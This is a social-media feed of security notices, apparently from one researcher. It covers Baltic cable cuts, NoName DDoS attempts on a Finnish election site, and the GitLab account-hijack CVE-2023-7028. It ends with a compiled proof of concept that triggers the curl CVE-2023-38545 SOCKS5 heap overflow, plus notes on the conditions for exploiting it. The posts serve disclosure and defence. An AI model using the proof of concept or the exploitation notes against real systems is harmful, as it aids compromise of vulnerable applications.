Notices by Harry Sintonen (harrysintonen@infosec.exchange)

The #GitHub feature we've all been waiting for: Disabling that Copilot nonsense.

#CLion1 telecom cable between Helsinki, Finland and Rostock, Germany has been cut. YLE news: https://yle.fi/a/74-20125339 (english) #infrastructure

Both damaged sea cables have now been repaired and are functioning normally.

• https://www.reuters.com/world/europe/one-two-damaged-baltic-sea-cables-back-online-arelion-says-2024-11-28/
• https://www.cinia.fi/en/news/cinias-c-lion1-submarine-cable-has-fully-restored

#infrastructure #telecoms #telecommunications

#NoName again trying to target Finnish presidential election, in vain. The targets include tulospalvelu.vaalit.fi - a website that is wholly unrelated to actual voting process. The voting in Finnish elections is pen and paper and no amount of #DDoS can affect it.

Finland specifically does NOT employ electronic or online voting systems. The reasons include:
- The existing pen and paper system has been honed to perfection: It's highly effective, secure and well established.
- Moving the system to online systems would allow potential interference from malicious parties.

#NoName target list for today: https://cyberplace.social/@GossiTheDog/111833295726201739 #infosec #elections #presidentinvaalit

The #GitLab #vulnerability allowing trivial account hijacking (CVE-2023-7028) will lead to ton of problems: It will allow malicious actors to perform #supplychain #attacks - something that will allow attacker to gain access to 3rd party who don't themselves run GitLab but just include from projects that do. I would suggest great caution regardless if you run GitLab yourself or not.

Naturally anyone using GitLab themselves must update as soon as possible. I would also suggest performing forensic investigation to find out if you have already been compromised, and take further action in case compromise has already occurred. Check "Were any accounts actually compromised due to this vulnerability?" section in this post for details: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/

Here’s a quick proof of concept to reproduce the #curl #CVE202338545 #heapoverflow #vulnerability. This PoC expects localhost to run a #socks5 proxy:

gcc -xc -fsanitize=address - -lcurl <<EOF
# include <curl/curl.h>
# include <string.h>
int main(void)
{
CURL *curl = curl_easy_init();
if(curl) {
char url[32768];
memcpy(url, "https://", 8);
memset(url + 8, 'A', sizeof(url) - 8 - 1);
url[sizeof(url) - 1] = '\0';
curl_easy_setopt(curl, CURLOPT_URL, url);
(void)curl_easy_perform(curl);
curl_easy_cleanup(curl);
}
return 0;
}
EOF
https_proxy=socks5h://127.0.0.1 ./a.out

Some comments:
• Application must use socks5h proxy to be vulnerable (it can be via proxy env variables or by explicitly settings the proxy options inside the app).
• Application must either fetch the attacker provided URL or follow redirects controlled by the attacker.
• Exploitation is made slightly more complicated due to this being a heap buffer overflow (many libc have built-in heap sanity checks). On modern systems with address space layout randomization (ASLR) an additional information leak is likely required for successful exploitation.
• Certain combinations of libcurl, platform and/or application options are not affected. See the advisory at https://curl.se/docs/CVE-2023-38545.html for more details.

#infosec